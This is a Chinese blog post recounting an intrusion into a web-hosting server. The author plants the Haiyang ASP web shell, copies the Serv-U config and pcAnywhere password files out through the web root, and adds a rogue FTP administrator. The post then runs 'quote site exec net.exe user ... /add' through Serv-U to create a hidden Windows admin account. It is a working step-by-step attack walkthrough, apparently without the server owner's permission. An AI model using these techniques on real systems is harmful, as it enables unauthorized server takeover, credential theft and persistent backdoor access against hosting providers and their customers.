最近的一次渗透 |
| 半夜2点多了,在和QQ上一个好友聊天,也不知道怎么的叫我测试他的空间商的服务器是不是安全,二话不说先发个 海阳木马上去 1,初战告捷 打开IE 输入 http://domain.com/mail.asp (mail.asp是我给木马改的名字),习惯的先输入密码,和我想的一样,服务器禁止了FSO!!没办法退回来,看看能不能浏览目录,c:\ 发送命令 ,good~~ 居然可以 C:\Documents and Settings-----0 C:\Inetpub-----0 C:\Program Files-----0 C:\WINNT-----0 C:\Inetpub 没删 看看scripts映射有没有删掉,http://ip/scripts,返回404,删掉了管理员还不错,但没有取消分区的everyone的所有权限让他的服务器受到致命的打击! 在ie 输入 <A href="ftp://ip/" target=_blank><FONT color=#163498>ftp://ip</FONT> 返回 serv-u 什么不能匿名登陆,不过这个已经够了,确认了他的ftp服务器段用的什么软件,找吧,一般serv-u会装在C:\Program Files ,C:\Program Files 发送命令 ,没有:(,d:\ 发送命令 看到D:\Program Files,肯定就在里面我心里想,果然看到了D:\Program Files\Serv-u,谢天谢地!接下来我需要获得ServUDaemon.ini这个文件,海阳木马提供了copy 功能 D:\Program Files\Serv-u\ServUDaemon.ini copy E:\www\我的朋友的目录\ 发送命令 Great ~~ 显示 command completed success 成功 在ie 输入 http://domain.com/ServUDaemon.ini 把ServUDaemon.ini down下来了 接着把ServUDaemon.ini 拷贝到 本地机的serv-u里,(我的电脑上安装了serv-u,你如果没有安装一个,在肉鸡上下载文件也很方便),打开 serviadmin ,你就会看到 肉鸡上的ftp用户了,不过 这些用户的口令是加密!不管他我们要获得是管理员,添加一个用户,把他添加成管理员,保存!把这个新的ServUDaemon.ini 发给我朋友,叫他用ftp上传,覆盖掉原来web目录里的 ok~~接下来没他的事了!!:) D:\Program Files\Serv-u\ServUDaemon.ini move E:\www\我的朋友的目录\bbs command completed success (注意:这里一定要先移除掉 ServUDaemon.ini 海阳木马不会自动覆盖) D:\Program Files\Serv-u\ 看看ServUDaemon.ini 是不是移除了,确实没有了 E:\www\我的朋友的目录\ServUDaemon.ini copy D:\Program Files\Serv-u\ command completed success 到这里只要服务器重起,我们就获得了ftp的管理员权限,可以通过本地机的servu 远程连接 肉鸡上的 servu !渗透基本成功 2,意外的发现 弄了半天,我还没扫描过他的服务器,不要弄出什么弱口令什么的,前面做的可真是笑话!:) 当然扫描结果没有这些,却意外的发现了5631 5632 端口,呵呵~~直到是什么的吗?pcanywhere的,去吧pcanywhere的密码文件down 下来,用流光看密码^o^ ,一般pcanywhere的密码文件都是放在 C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere 目录,PCA.*****.cif 这个文件就是了 C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\PCA.23212.cif copy E:\www\我的朋友的目录\ http://domain.com/PCA.23212.cif 用流光读取了密码,顺利的连上了肉鸡,当然肉鸡是锁定的,不然可以直接装后门了! 但最大的收获,pcanywhere可以重起服务器,哈哈哈!我现在是ftp的管理员了 远程连上肉鸡的servu,创建了一个naxin的用户,添加了 主目录 指向d:\www 并添加c d e f 分区的映射,全部权限!现在我控制着服务器的生杀大权,虽然不是系统管理员,但可以通过ftp删除文件,嘎嘎嘎~~ 然而我发现ftp只能用port模式连接,在后面的渗透埋下了阴影 3,最后的胜利 入侵者有着强烈的控制欲,我当然不会甘心只得到ftp的管理员,我要的是系统管理员! 用过serv-u的应该看到有个执行权限吧!嗬嗬用它就可以来添加管理员,具体命令 shell>ftp ftp>open ip Connected to ip. 220 Serv-U FTP Server v4.0 for WinSock ready... User (ip:(none)): id 331 User name okay, please send complete E-mail address as password. Password:password 230 User logged in, proceed. ftp> cd winnt 250 Directory changed to /WINNT ftp>cd system32 250 Directory changed to /WINNT/system32 ftp>quote site exec net.exe user cnaxin$ 123 /add 200 EXEC command successful (TID=33). ftp>quote site exec net.exe localhost administrators cnaxin$ /add 哈哈哈!完成了!! |
相关视频
相关阅读 Windows错误代码大全 Windows错误代码查询激活windows有什么用Mac QQ和Windows QQ聊天记录怎么合并 Mac QQ和Windows QQ聊天记录Windows 10自动更新怎么关闭 如何关闭Windows 10自动更新windows 10 rs4快速预览版17017下载错误问题Win10秋季创意者更新16291更新了什么 win10 16291更新内容windows10秋季创意者更新时间 windows10秋季创意者更新内容kb3150513补丁更新了什么 Windows 10补丁kb3150513是什么
热门文章
黑客大战直播网址 黑客
最新文章
黑客大战直播网址 黑客
什么是木马,什么是木马
计算机病毒是指什么什么是木马,什么是木马病毒黑客破解密码常用的方法告诉你黑客的Google搜索技巧
人气排行 如何攻击局域网电脑无线网络密码破解教程(破解无线路由WEP加密网站获得系统权限攻击教程流光破解ftp密码教程计算机病毒是指什么黑客破解密码常用的方法如何命令行/DOS下列出进程名与进程文件路径2010黑客工具
查看所有0条评论>>